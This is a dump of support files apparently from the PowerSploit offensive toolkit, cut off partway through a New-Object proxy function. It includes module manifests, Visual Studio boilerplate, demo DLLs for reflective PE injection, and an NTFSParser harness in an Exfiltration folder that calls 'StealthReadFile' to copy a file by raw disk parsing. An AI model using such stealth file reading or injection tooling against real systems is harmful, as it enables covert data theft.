Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /Capstone/Capstone.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Capstone.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '2.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'see LICENSE.TXT' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'Capstone Disassembly Framework Binding Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '3.0' 23 | 24 | # Minimum version of the common language runtime (CLR) required by this module 25 | CLRVersion = '4.0' 26 | 27 | # Assemblies that must be loaded prior to importing this module 28 | RequiredAssemblies = 'lib/capstone.dll' 29 | 30 | # Format files (.ps1xml) to be loaded when importing this module 31 | FormatsToProcess = 'Get-CSDisassembly.format.ps1xml' 32 | 33 | # Functions to export from this module 34 | FunctionsToExport = '*' 35 | 36 | # List of all modules packaged with this module. 37 | ModuleList = @(@{ModuleName = 'Capstone'; ModuleVersion = '1.0.0.0'; GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b'}) 38 | 39 | # List of all files packaged with this module 40 | FileList = 'Capstone.psm1', 41 | 'Capstone.psd1', 42 | 'Get-CSDisassembly.format.ps1xml', 43 | 'LICENSE.TXT', 44 | 'README', 45 | 'lib/capstone.dll', 46 | 'lib/x86/libcapstone.dll', 47 | 'lib/x64/libcapstone.dll' 48 | } 49 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /Capstone/LICENSE.TXT: -------------------------------------------------------------------------------- 1 | This is the software license for Capstone disassembly framework. 2 | Capstone has been designed & implemented by Nguyen Anh Quynh 3 | See http://www.capstone-engine.org for further information. 4 | 5 | Copyright (c) 2013, COSEINC. 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without 9 | modification, are permitted provided that the following conditions are met: 10 | 11 | * Redistributions of source code must retain the above copyright notice, 12 | this list of conditions and the following disclaimer. 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | * Neither the name of the developer(s) nor the names of its 17 | contributors may be used to endorse or promote products derived from this 18 | software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 23 | ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 24 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 25 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 26 | SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 27 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 28 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 29 | ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 30 | POSSIBILITY OF SUCH DAMAGE. 31 | -------------------------------------------------------------------------------- /Capstone/Get-CSDisassembly.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | InstructionView 6 | 7 | Capstone.Instruction 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | Address 27 | 0x{0:X8} 28 | 29 | 30 | Mnemonic 31 | 32 | 33 | Operands 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | #include "stdafx.h" 19 | #include "NTFS.h" 20 | #include "NTFS_Attribute.h" 21 | #include "NTFS_Common.h" 22 | #include "NTFS_DataType.h" 23 | #include "NTFS_FileRecord.h" 24 | 25 | using namespace std; 26 | 27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*); 28 | 29 | int _tmain(int argc, _TCHAR* argv[]) 30 | { 31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll"); 32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile"); 33 | 34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress; 35 | 36 | DWORD buffSize = 1024*1024; 37 | BYTE* buffer = new BYTE[buffSize]; 38 | DWORD bytesRead = 0; 39 | ULONGLONG bytesLeft = 0; 40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft); 41 | 42 | cout << "Return value: " << ret << endl; 43 | 44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary); 45 | myFile.write((char*)buffer, bytesRead); 46 | 47 | return 0; 48 | } 49 | 50 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL application. 9 | 10 | 11 | DemoDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL.cpp 25 | This is the main DLL source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : LogonUser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this LogonUser application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your LogonUser application. 9 | 10 | 11 | LogonUser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | LogonUser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | LogonUser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named LogonUser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : NTFSParser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParser application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParser application. 9 | 10 | 11 | NTFSParser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp: -------------------------------------------------------------------------------- 1 | // DemoDLL.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include "DemoDLL.h" 6 | 7 | using namespace std; 8 | 9 | 10 | extern "C" __declspec( dllexport ) char* StringFunc() 11 | { 12 | ostream *outputStream = NULL; 13 | 14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout. 15 | //outputStream = &cout; 16 | 17 | ostringstream *stringStream = new ostringstream(); 18 | outputStream = stringStream; 19 | 20 | (*outputStream) << "String DLL function is working" << endl << endl; 21 | 22 | string output = (*stringStream).str(); 23 | const char* outputStr = output.c_str(); 24 | 25 | char* out = new char[output.size()+1]; 26 | strcpy(out, outputStr); 27 | out[output.size()] = '\0'; 28 | 29 | 30 | return out; 31 | } 32 | 33 | extern "C" __declspec( dllexport ) void VoidFunc() 34 | { 35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n"); 36 | return; 37 | } 38 | 39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc() 40 | { 41 | wostream *outputStream = NULL; 42 | 43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout. 44 | outputStream = &wcout; 45 | 46 | wostringstream *stringStream = new wostringstream(); 47 | outputStream = stringStream; 48 | 49 | (*outputStream) << L"WString DLL function is working" << endl << endl; 50 | 51 | wstring output = (*stringStream).str(); 52 | const wchar_t* outputStr = output.c_str(); 53 | 54 | wchar_t* out = new wchar_t[output.size()+1]; 55 | wcscpy(out, outputStr); 56 | out[output.size()] = '\0'; 57 | 58 | 59 | return out; 60 | } -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MD Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MD application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MD application. 9 | 10 | 11 | DemoExe_MD.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MD.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MD.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MDd application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MDd application. 9 | 10 | 11 | DemoExe_MDd.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MDd.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MDd.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this ExeToInjectInTo application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your ExeToInjectInTo application. 9 | 10 | 11 | ExeToInjectInTo.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | ExeToInjectInTo.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | ExeToInjectInTo.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | 44 | 45 | Source Files 46 | 47 | 48 | Source Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /ReverseEngineering/Get-ILDisassembly.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ILInstructionView 6 | 7 | IL_INSTRUCTION 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | Position 30 | 31 | 32 | Instruction 33 | 34 | 35 | Operand 36 | 37 | 38 | if ($_.MetadataToken) {"0x$($_.MetadataToken.ToString('X8'))"} 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /ReverseEngineering/ConvertTo-String.ps1: -------------------------------------------------------------------------------- 1 | filter ConvertTo-String 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Converts the bytes of a file to a string. 7 | 8 | PowerSploit Function: ConvertTo-String 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | ConvertTo-String converts the bytes of a file to a string that has a 17 | 1-to-1 mapping back to the file's original bytes. ConvertTo-String is 18 | useful for performing binary regular expressions. 19 | 20 | .PARAMETER Path 21 | 22 | Specifies the path to the file to convert. 23 | 24 | .EXAMPLE 25 | 26 | PS C:\>$BinaryString = ConvertTo-String C:\Windows\SysWow64\kernel32.dll 27 | PS C:\>$HotpatchableRegex = [Regex] '[\xCC\x90]{5}\x8B\xFF' 28 | PS C:\>$HotpatchableRegex.Matches($BinaryString) 29 | 30 | Description 31 | ----------- 32 | Converts kernel32.dll into a string. A binary regular expression is 33 | then performed on the string searching for a hotpatchable code 34 | sequence - i.e. 5 nop/int3 followed by a mov edi, edi instruction. 35 | 36 | .NOTES 37 | 38 | The intent of ConvertTo-String is not to replicate the functionality 39 | of strings.exe, rather it is intended to be used when 40 | performing regular expressions on binary data. 41 | 42 | .LINK 43 | 44 | http://www.exploit-monday.com 45 | #> 46 | 47 | [OutputType([String])] 48 | Param ( 49 | [Parameter( Mandatory = $True, 50 | Position = 0, 51 | ValueFromPipeline = $True )] 52 | [ValidateScript({-not (Test-Path $_ -PathType Container)})] 53 | [String] 54 | $Path 55 | ) 56 | 57 | $FileStream = New-Object -TypeName IO.FileStream -ArgumentList (Resolve-Path $Path), 'Open', 'Read' 58 | 59 | # Note: Codepage 28591 returns a 1-to-1 char to byte mapping 60 | $Encoding = [Text.Encoding]::GetEncoding(28591) 61 | 62 | $StreamReader = New-Object IO.StreamReader($FileStream, $Encoding) 63 | 64 | $BinaryText = $StreamReader.ReadToEnd() 65 | 66 | $StreamReader.Close() 67 | $FileStream.Close() 68 | 69 | Write-Output $BinaryText 70 | } 71 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Debug|x64 = Debug|x64 12 | Release|Win32 = Release|Win32 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32 17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32 18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64 19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64 20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32 21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32 22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64 23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64 24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32 26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64 27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64 28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32 29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32 30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64 31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64 32 | EndGlobalSection 33 | GlobalSection(SolutionProperties) = preSolution 34 | HideSolutionNode = FALSE 35 | EndGlobalSection 36 | EndGlobal 37 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : logon Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this logon DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your logon application. 9 | 10 | 11 | logon.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | logon.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | logon.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named logon.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParserDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParserDLL application. 9 | 10 | 11 | NTFSParserDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParserDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParserDLL.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL_RemoteProcess application. 9 | 10 | 11 | DemoDLL_RemoteProcess.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL_RemoteProcess.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL_RemoteProcess.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /ReverseEngineering/New-Object.ps1: -------------------------------------------------------------------------------- 1 | function New-Object 2 | { 3 | [CmdletBinding(DefaultParameterSetName='Net')] 4 | param( 5 | [Parameter(ParameterSetName='Net', Mandatory=$true, Position=0)] 6 | [string] 7 | ${TypeName}, 8 | 9 | [Parameter(ParameterSetName='Com', Mandatory=$true, Position=0)] 10 | [string] 11 | ${ComObject}, 12 | 13 | [Parameter(ParameterSetName='Net', Position=1)] 14 | [Alias('Args')] 15 | [System.Object[]] 16 | 